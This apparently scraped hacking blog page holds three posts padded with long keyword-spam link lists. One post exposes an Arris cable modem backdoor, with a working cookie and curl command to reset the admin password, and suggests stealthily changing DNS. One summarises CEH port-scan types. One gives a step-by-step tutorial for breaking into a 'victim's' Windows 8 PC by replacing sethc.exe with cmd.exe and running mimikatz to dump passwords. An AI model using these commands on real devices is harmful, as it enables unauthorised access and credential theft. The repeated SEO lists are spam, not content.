Search This Blog

Friday, May 26, 2023

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related posts


  1. Pentest Tools For Ubuntu
  2. Pentest Tools Url Fuzzer
  3. Hacker Security Tools
  4. Pentest Tools Tcp Port Scanner
  5. Hack Tools Github
  6. Free Pentest Tools For Windows
  7. Hacker Security Tools
  8. Pentest Recon Tools
  9. Hack Tools For Mac
  10. How To Make Hacking Tools
  11. Nsa Hacker Tools
  12. Hacking Tools And Software
  13. Hacker Tools Windows
  14. Hack Tools For Games
  15. Pentest Tools Kali Linux
  16. Pentest Tools Port Scanner
  17. Best Pentesting Tools 2018
  18. Best Hacking Tools 2020
  19. Hacker Tools Software
  20. Blackhat Hacker Tools
  21. Hacker Tools 2020
  22. World No 1 Hacker Software
  23. Hacking Tools For Kali Linux
  24. Hacking Tools Free Download
  25. Hacker Tools Free Download
  26. Hacks And Tools
  27. Bluetooth Hacking Tools Kali
  28. Hacking Tools Software
  29. Nsa Hack Tools Download
  30. Hack Tools
  31. Hacking Tools Windows
  32. Pentest Tools List
  33. Hacker Tools Linux
  34. Hacking Tools For Mac
  35. Hacker Tools For Pc
  36. Best Pentesting Tools 2018
  37. Kik Hack Tools
  38. Hack Tools Online
  39. Black Hat Hacker Tools
  40. Nsa Hack Tools Download
  41. Beginner Hacker Tools
  42. Pentest Tools Website
  43. Usb Pentest Tools
  44. Hacks And Tools
  45. How To Install Pentest Tools In Ubuntu
  46. Hacking Tools For Windows
  47. Blackhat Hacker Tools
  48. Hacker Tools Github
  49. Hack Tools Online
  50. Pentest Tools
  51. Hacking Tools Software
  52. Hacker Hardware Tools
  53. Pentest Automation Tools
  54. Hacking Tools Windows
  55. World No 1 Hacker Software
  56. Hacking Tools Github
  57. Hackers Toolbox
  58. Pentest Tools
  59. Hacking Tools Mac
  60. Hack Tools For Ubuntu
  61. Hacks And Tools
  62. Hacking Tools For Windows
  63. World No 1 Hacker Software
  64. Tools For Hacker
  65. Hack Tools For Games
  66. Pentest Tools Windows
  67. Hack Tools For Ubuntu
  68. Hacking Tools Free Download
  69. Pentest Tools Kali Linux
  70. Hacker Tools For Ios
  71. Hack Tools For Ubuntu
  72. How To Hack
  73. Hacker Techniques Tools And Incident Handling
  74. Pentest Tools Windows
  75. Pentest Tools
  76. Hacker Tools 2020
  77. Hack Tools Download
  78. Hacker Tools Linux
  79. Hacking Tools Windows 10
  80. Pentest Tools Android
  81. Hacking Tools For Windows Free Download
  82. Hack Tools Pc
  83. Hacking Tools Online
  84. Hacking Tools Name
  85. Pentest Reporting Tools
  86. Hacking Tools For Mac
  87. Hack Tools For Mac
  88. Hacker Search Tools
  89. Usb Pentest Tools
  90. Pentest Tools Framework
  91. Hacker Tools Hardware
  92. Pentest Reporting Tools
  93. Install Pentest Tools Ubuntu
  94. How To Hack
  95. Hack Tool Apk No Root
  96. Pentest Tools Windows
  97. Black Hat Hacker Tools
  98. Hacking Tools For Mac
  99. Top Pentest Tools
  100. Pentest Tools Nmap
  101. Black Hat Hacker Tools
  102. Hacker Tools For Windows
  103. Pentest Tools For Android
  104. Hack Website Online Tool
  105. Pentest Tools Website
  106. Beginner Hacker Tools
  107. Tools 4 Hack
  108. Hacking Tools And Software
  109. Hacks And Tools
  110. Pentest Tools Github
  111. Hacking Tools For Kali Linux
  112. Hacking Apps
  113. Hacking Tools Software
  114. Hacking Tools
  115. Hacker Tools Windows
  116. Hacking Tools Windows
  117. Hacker Search Tools
  118. Hacking Tools For Games
  119. Pentest Tools Bluekeep
  120. Pentest Tools Apk
  121. Usb Pentest Tools
  122. Nsa Hacker Tools
  123. Pentest Tools Apk
  124. Hacker
  125. Pentest Tools Kali Linux
  126. What Is Hacking Tools
  127. Computer Hacker
  128. Hacking Tools For Windows
  129. Game Hacking
  130. Pentest Tools Alternative
  131. What Is Hacking Tools
  132. Game Hacking
  133. Hacking Tools Windows
  134. Physical Pentest Tools
  135. Hacking Tools And Software
  136. Pentest Tools Online
  137. Hacker Tool Kit
  138. New Hack Tools
  139. Hacking Tools For Pc
  140. Hacking Tools For Windows 7
  141. Hack Tools Download
  142. Hack Tools For Windows
  143. Pentest Tools Download
  144. Pentest Tools Review
  145. Hacker Tool Kit
  146. Hacking Tools For Beginners
  147. Hack Tools For Pc
  148. Pentest Tools List
  149. Pentest Tools Nmap
  150. Hacking Tools For Pc
  151. Hack Tools For Pc
  152. Hack Tool Apk No Root
  153. Hacking Tools Name
  154. Game Hacking
  155. Pentest Tools List
  156. Pentest Tools Find Subdomains
  157. Hack Tool Apk
  158. Top Pentest Tools
  159. Hacker Tools For Pc
  160. Hack Apps
  161. Pentest Tools Android
  162. Hacker Tools Github
  163. Bluetooth Hacking Tools Kali
  164. Pentest Tools For Ubuntu
  165. Nsa Hack Tools
  166. Wifi Hacker Tools For Windows
  167. Hacking Tools 2019
  168. Pentest Tools For Mac
  169. Game Hacking
  170. Pentest Tools Url Fuzzer
  171. Hacking Tools Windows 10
  172. Hacker Hardware Tools
  173. Pentest Tools Alternative
  174. Pentest Tools Online
  175. What Is Hacking Tools
  176. Hacking Tools Software
  177. Pentest Reporting Tools

CEH: Gathering Network And Host Information, Types Of Scan


In Hacking the main focus is over gathering the information about victim or victim's machine. Which will help to find out which type of exploit will works according to the given circumstances. Gathering the network and host information means to find out by which network, the which victim's machine is connected and communicating over the network. Moreover, scanning is also performed for gathering information about open and closed ports. After that they'll able to find the vulnerabilities in the target system and try to get access to the system.

Types Of Scan

As a CEH you should know the scan types and uses:

SYN

SYN scan doesn't complete the TCP three way handshake that is why it is known as a half-open scan. An attacker send a SYN packet to the victim machine if SYN/ACK packet is received back to attacker, then it clarify that the port is listening due to the acknowledgment by the victim that it has completed the connection. While if the attacker is received the RST/ACK packet then it assumed that the port is closed or open.


XMAS

XMAS scan works only on target system that has the RFC 793 development of TCP/IP and it doesn't works against any version of windows.
XMAS scan send a packet with by setting up the FIN, URG and PSH flags of the TCP header. The function of this scan is if the port is active there will be no response but if the port is closed the target responds with a RST/ACK packet.


FIN

A FIN scan send a packet by setting up only the FIN flag of the TCP. This scan is similar to XMAS scan. FIN scan receives no response if the port is active while if the port is closed it receives the RST/ACK packet.


NULL 

NULL scan is also similar to the XMAS scan. But the only difference is that it sends a packet without setting up the any flag of TCP header. NULL scan receives no response if the port is open but if the port is closed it receives the RST/ACK packet.


IDLE

It is just like spoofing an IP address by sending a SYN packet to the victim's machine to find out which services are available over the system. This scan is completed with the help of another system called as "Zombie" (that is not receiving or transmitting any information).


More articles


  1. Hacker
  2. Pentest Tools Windows
  3. Pentest Tools For Android
  4. Hak5 Tools
  5. Hacking Tools Download
  6. Hacking Tools For Windows 7
  7. Hacker Security Tools
  8. Tools Used For Hacking
  9. Pentest Tools Download
  10. Pentest Tools Free
  11. Nsa Hack Tools Download
  12. Hacking Tools Mac
  13. Tools Used For Hacking
  14. Hacker Tools Free Download
  15. Growth Hacker Tools
  16. Pentest Tools Open Source
  17. How To Make Hacking Tools
  18. Hackers Toolbox
  19. Pentest Tools Port Scanner
  20. Pentest Tools Bluekeep
  21. Hacking Tools For Pc
  22. Hacking Tools Windows 10
  23. Pentest Tools Nmap
  24. Hacker Tools List
  25. Pentest Tools Online
  26. Pentest Tools Open Source
  27. Pentest Tools Apk
  28. Hacker Tool Kit
  29. Pentest Tools Subdomain
  30. Hacker Tools Github
  31. Physical Pentest Tools
  32. Pentest Tools Tcp Port Scanner
  33. Hacker Search Tools
  34. Hack Tools For Mac
  35. Pentest Tools Port Scanner
  36. Free Pentest Tools For Windows
  37. Hack Tool Apk
  38. Hacker Tools
  39. Hacker Tools 2020
  40. Hacker Tools 2020
  41. Hacking Tools For Pc
  42. Hacking Tools Github
  43. Hacking Tools Windows
  44. Pentest Tools For Windows
  45. Pentest Tools Open Source
  46. Usb Pentest Tools
  47. Pentest Tools Apk
  48. Hack Tools Download
  49. Hacking Tools Download
  50. Hacker Tools Mac
  51. Hack Apps
  52. Hacking Tools For Windows
  53. Pentest Tools Framework
  54. Hacker Tools List
  55. Computer Hacker
  56. Pentest Tools Website
  57. Hackrf Tools
  58. Pentest Tools Free
  59. Hacker Tools Github
  60. Pentest Tools For Mac
  61. Hack Tools For Windows
  62. Pentest Tools Website Vulnerability
  63. Hacking Tools Usb
  64. Hacking Tools For Windows 7
  65. Hacking Tools 2019
  66. Hacker Tools Github
  67. Hacker Tools For Ios
  68. Pentest Box Tools Download
  69. Wifi Hacker Tools For Windows
  70. Hacker Tools Software
  71. Black Hat Hacker Tools
  72. Tools Used For Hacking
  73. Pentest Tools Free
  74. Pentest Tools For Mac
  75. Pentest Tools Subdomain
  76. Pentest Tools Online
  77. Pentest Tools For Windows
  78. Pentest Tools Tcp Port Scanner
  79. Pentest Box Tools Download
  80. Hack Tools For Games
  81. Hacker Tool Kit
  82. Best Hacking Tools 2019
  83. Pentest Tools Alternative
  84. Pentest Tools Free
  85. Hacker Tools Software
  86. Black Hat Hacker Tools
  87. Hacking Tools Windows 10
  88. Hacks And Tools

Thursday, May 25, 2023

Hackerhubb.blogspot.com

Hackerhubb.blogspot.comMore info

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Related links


  1. Hacking Tools Free Download
  2. Hacker Tools For Mac
  3. Hacker Tools Github
  4. Blackhat Hacker Tools
  5. Growth Hacker Tools
  6. Hacker
  7. Pentest Tools Windows
  8. Bluetooth Hacking Tools Kali
  9. Hack Tools Download
  10. Blackhat Hacker Tools
  11. Hacking Tools Github
  12. Hacking Tools Kit
  13. Hacker Tools For Windows
  14. Hacker Tools Free
  15. Hacking Tools For Kali Linux
  16. Pentest Tools List
  17. Hackers Toolbox
  18. Hacking App
  19. Pentest Tools Find Subdomains
  20. Nsa Hacker Tools
  21. Nsa Hack Tools
  22. Hacker Tools Hardware
  23. Hack Tools Download
  24. Hack Tools Github
  25. Pentest Tools Tcp Port Scanner
  26. Hacker Tool Kit
  27. Hacker Hardware Tools
  28. Hacking Tools Software
  29. Pentest Tools Website Vulnerability
  30. Best Hacking Tools 2020
  31. Pentest Tools Tcp Port Scanner
  32. Hack Apps
  33. Pentest Tools Bluekeep
  34. Pentest Tools Download
  35. Pentest Tools Subdomain
  36. Pentest Tools Subdomain
  37. Hacking Tools
  38. Pentest Tools Download
  39. Hak5 Tools
  40. Pentest Tools Framework
  41. Hacker Tools Apk Download
  42. How To Install Pentest Tools In Ubuntu
  43. New Hack Tools
  44. Best Hacking Tools 2020
  45. Hacking Tools Windows
  46. Hacking Tools For Pc
  47. Hacking Tools For Kali Linux
  48. Computer Hacker
  49. Hacker Security Tools
  50. Pentest Tools
  51. Hack And Tools
  52. Physical Pentest Tools
  53. Hacking Tools Name
  54. Pentest Tools Bluekeep
  55. Pentest Tools Website Vulnerability
  56. Termux Hacking Tools 2019
  57. Physical Pentest Tools
  58. Hacker Tools Mac
  59. Pentest Tools Github
  60. Best Hacking Tools 2020
  61. Pentest Tools Port Scanner
  62. Hacker Tools For Windows
  63. Hacking Tools Free Download
  64. Hacking Tools Kit
  65. Nsa Hack Tools Download
  66. Hacker Tools Mac
  67. Easy Hack Tools
  68. Hacker Tools